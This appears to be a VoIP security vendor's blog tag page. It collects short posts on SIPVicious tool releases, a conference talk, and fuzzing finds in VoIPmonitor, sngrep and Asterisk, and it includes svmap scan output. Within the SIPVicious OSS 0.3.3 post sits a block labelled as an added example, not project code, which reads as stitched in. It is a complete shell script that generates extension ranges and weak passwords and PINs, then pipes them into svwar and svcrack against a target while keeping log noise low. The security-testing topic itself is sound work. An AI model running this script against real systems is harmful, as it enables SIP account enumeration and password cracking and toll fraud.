
Tag: SIP Security

DEMO - An overview of the VoIP and RTC offensive security toolset, SIPVicious PRO

We pushed out a video that introduces the basics of SIPVicious PRO by demonstrating some of the attack tools and showing the building blocks for automating security testing of VoIP and WebRTC applications and infrastructure.

What follows is a transcript of the video.

Introduction

Hello, I’m Sandro Gauci from Enable Security. In this video, I’d like to show you what we have been working on, SIPVicious PRO! Let’s start by introducing the tools. SIPVicious PRO is a command-line toolset, meant to test the security of realtime communications, which includes Voice over IP as well as WebRTC infrastructure.

Read more about DEMO - An overview of the VoIP and RTC offensive security toolset, SIPVicious PRO

SIPVicious PRO 6.0.0-beta.4 getting close to take-off!

This one’s a bit of a boring update for SIPVicious PRO. That’s because we’re getting to a stable place where flag names and values do not change too often, which means we’re getting out of beta rather soon!

However, it is still a major update because we made a significant number of internal changes. For example, we standardized a number of flags to be the same across all tools. We discovered that we can minimize each tool’s flagset by making use of config flags such as --auth-config, which let you configure behaviours specific to how SIPVicious handles authentication (e.g. selecting a specific algorithm for digest authentication). This allows us to show the flags that are more commonly used and hide the really custom or advanced ones until they’re actually needed. And obviously, we fixed lots of bugs.

Read more about SIPVicious PRO 6.0.0-beta.4 getting close to take-off!

TADSummit Asia 2021 talk about SIPVicious Pro and the Demo Server

TADSummit is a great event where people from different backgrounds who are somehow involved in communications contribute in various ways. I, personally, always look forward to seeing what’s coming up in the next TADSummit event. At the moment, TADSummit Asia presentations are being released on a daily basis on the main site, and last week the presentation that I prepared was published!

In the previous TADSummit, I presented on why we need to bring an offensive approach to RTC security. In this one, I introduce our contributions to the space, i.e. SIPVicious OSS, SIPVicious PRO and the demo server.

Read more about TADSummit Asia 2021 talk about SIPVicious Pro and the Demo Server

SIPVicious OSS 0.3.3 released with new STDIN and target URL specification

Without further ado, please say hello to SIPVicious OSS 0.3.3!

To install or upgrade run pip install -U sipvicious. For more installation methods, see the wiki.

What’s new?

SIP extensions and passwords from standard input

We have a new feature which seems so simple yet so powerful: STDIN for dictionary input! This works for both svwar and svcrack. It is similar to what we did with SIPVicious PRO, which (surprisingly) proved to be a very popular feature. So, we thought of backporting it to SVOSS (SIPVicious OSS). From now on, one can easily use external tools to generate passwords on the fly for cracking with svcrack, or to generate SIP extensions on the fly for SIP extension enumeration with svwar. To do so, instead of specifying a filename to the --dictionary flag, give it - (a single dash) as its value and pipe the candidates into the tool, one per line.
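The following is an added example, not code from the SIPVicious project, showing the STDIN workflow described above: extensions and passwords are generated on the fly by small shell functions and piped into svwar and svcrack through --dictionary -. The target 192.0.2.10, the extension range 1000-1099 and the extension 1001 are placeholders; the password patterns (extension as password, extension with a common suffix, four-digit PINs) are this example’s own choice of weak candidates, not a list taken from the post. The tools are only invoked when SVTARGET is set, so the generators can be inspected without touching a server.

```shell
#!/bin/sh
# Added example (not part of SIPVicious OSS): generate dictionary input on
# the fly and feed it to svwar / svcrack over STDIN using "--dictionary -".
# Placeholders: SVTARGET (e.g. 192.0.2.10), extension range 1000-1099,
# extension 1001.

# gen_extensions FIRST LAST: print every extension from FIRST to LAST,
# one per line, zero-padded to the width of LAST, for piping into svwar.
# FIRST must be given without leading zeros (shell arithmetic would treat
# a leading zero as octal).
gen_extensions() {
    width=${#2}
    i=$1
    while [ "$i" -le "$2" ]; do
        printf "%0${width}d\n" "$i"
        i=$((i + 1))
    done
}

# raw_passwords EXT: likely weak passwords for one extension, cheapest
# guesses first: the extension itself, the extension doubled, the extension
# with a common suffix, then every four-digit numeric PIN (0000-9999).
raw_passwords() {
    ext=$1
    printf '%s\n' "$ext" "${ext}${ext}"
    for suffix in 123 1234 0000 1111; do
        printf '%s%s\n' "$ext" "$suffix"
    done
    i=0
    while [ "$i" -le 9999 ]; do
        printf '%04d\n' "$i"
        i=$((i + 1))
    done
}

# gen_passwords EXT: the same stream with duplicates removed. Every line is
# one online authentication attempt against the PBX, so a candidate that
# appears twice (e.g. "1001" as the extension and again as a PIN) must not
# be spent twice.
gen_passwords() {
    raw_passwords "$1" | awk '!seen[$0]++'
}

# Only run the real tools when a target is configured.
if [ -n "${SVTARGET:-}" ]; then
    # Enumerate extensions 1000-1099 from STDIN instead of a wordlist file.
    gen_extensions 1000 1099 | sipvicious_svwar --dictionary - "$SVTARGET"
    # Crack extension 1001 with passwords streamed from STDIN.
    gen_passwords 1001 | sipvicious_svcrack -u 1001 --dictionary - "$SVTARGET"
fi
```

Because the candidates are streamed rather than written to disk, the generator can be swapped for anything that prints one candidate per line, and the dedup step keeps the online attempt count, and therefore the noise in the target’s logs, as low as the wordlist allows.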

Read more about SIPVicious OSS 0.3.3 released with new STDIN and target URL specification

Bug discovery diaries: Abusing VoIPmonitor for Remote Code Execution

Executive summary (TL;DR)

We fuzzed VoIPmonitor using SIPVicious PRO and got a crash in the software’s live sniffer feature when that feature is switched on. We identified the cause of the crash by looking at the source code: a classic buffer overflow. We then realized that it was fully exploitable, since the distributed binaries are built without any memory corruption protection. So we wrote exploit code using ROP gadgets to get remote code execution by sending just one SIP packet. We also reported this upstream, and it has been fixed in the official distribution.

Read more about Bug discovery diaries: Abusing VoIPmonitor for Remote Code Execution

SIPVicious OSS 0.3.2 released with more IPv6 goodness!

The free and opensource version of SIPVicious has been updated so that support for IPv6 is also available in svmap. If you can’t wait to try it out, you can get it at the official repository or by using pip3 install sipvicious --upgrade.

So now, with svmap’s IPv6 support, you can do stuff like:

sipvicious_svmap -6 -v 2a01:7e01::f03c:92ff:fecf:60a8

INFO:DrinkOrSip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:DrinkOrSip:-:61500        ->      2a01:7e01::f03c:92ff:fecf:60a8:5060     ->      kamailio (5.4.4 (x86_64/linux))
INFO:root:we have 1 devices
+-------------------------------------+---------------------------------+
| SIP Device                          | User Agent                      |
+=====================================+=================================+
| 2a01:7e01::f03c:92ff:fecf:60a8:5060 | kamailio (5.4.4 (x86_64/linux)) |
+-------------------------------------+---------------------------------+
INFO:root:Total time: 0:00:03.028053

Do note that CIDR scans on IPv6 are unsupported, but of course, one can scan multiple ports for SIP on a target.

Read more about SIPVicious OSS 0.3.2 released with more IPv6 goodness!

SIPVicious PRO 6.0.0-beta.2 takes STDIN and fixes various bugs

What we’re excited about in this minor update is the addition of a new feature to the SIP cracker in SIPVicious PRO. Basically, it now takes input from external tools through standard input.

Why? Because it allows unlimited ways of generating potential usernames, passwords and/or SIP extensions using external tools such as the maskprocessor included with the well known password cracker, hashcat. Here’s an animation showing usage of the maskprocessor to generate passwords for the SIP online cracking tool:

Read more about SIPVicious PRO 6.0.0-beta.2 takes STDIN and fixes various bugs

Bug discovery diaries: uncovering sngrep overflow issues with blackbox fuzzing

Executive summary (TL;DR)

During OpenSIPIt, we crashed sngrep by mistake while briefly fuzzing OpenSIPS. Later on we set up a docker environment to reproduce the issue, identified the actual bugs and reported them upstream. If you want to learn the simple steps to do this, you actually have to read the rest of the post :-)

sngrep crash during the live OpenSIPIt event

Last year we participated in OpenSIPIt’s interoperability testing event, which was held between the 14th and 15th of September 2020. Amongst the topics discussed were RFC 8760 (SHA-2 digest authentication), STIR/SHAKEN and RFC 8599 (push notifications). Whilst trying to stick to the agenda, we couldn’t resist the temptation to fuzz test the servers that were available to us. An instance of OpenSIPS was tested for a very short period of time; however, we did not observe any server crashes.

Read more about Bug discovery diaries: uncovering sngrep overflow issues with blackbox fuzzing

SIPVicious PRO beta release contains SIP fuzzer and better automation

We just made SIPVicious PRO v6.0.0-beta.1 available to our beta testers. This latest release brings a new SIP fuzzer and enhancements for automation to your favourite RTC offensive security toolset. We have the following highlights with this release:

  • New fuzzing tools - sip fuzz method. This used to be in a separate internal tool called gasoline (see our toolset page); it has now been polished and has joined the SVPRO toolset. It has been used to identify vulnerabilities in Kamailio (advisory), sngrep (advisory 1 and 2) and other SIP servers.
  • Tool results provided at the end of a test are now standardized with a JSON schema so that they can easily be parsed or used to produce reports by third-party tools. See the documentation about automation and results.
  • Exit codes updated for future compatibility when using it within automation systems. See the documentation about signal handling and exit codes.
  • Full IPv6 support across all tools.
  • Documentation site is now refreshed, and central to SIPVicious PRO at https://docs.sipvicious.pro.
  • And of course, various bug fixes. Full changelog can be seen here.

Read more about SIPVicious PRO beta release contains SIP fuzzer and better automation

How doing QA testing for SIPVicious PRO led to an Asterisk DoS

Executive summary (TL;DR)

While heavily testing SIPVicious PRO for bugs, we encountered an unexpected crash in Asterisk. We reported this to the Asterisk team, who issued a fix.

How the Asterisk crash was found

We test our software as much as we can because, like any other software, ours contains bugs too! When it comes to SIPVicious PRO, one of our quality assurance tests is to run it against instances of Asterisk and Kamailio and check for expected results. Our test suite loads these servers in a docker environment and automatically runs SIPVicious PRO against them. During these tests, we look for crashes, race conditions and other unchecked states that we might have failed to address in our own code. We do this through various methods, one of which is to observe the exit codes of SIPVicious PRO, which indicate the result of each test.

Read more about How doing QA testing for SIPVicious PRO led to an Asterisk DoS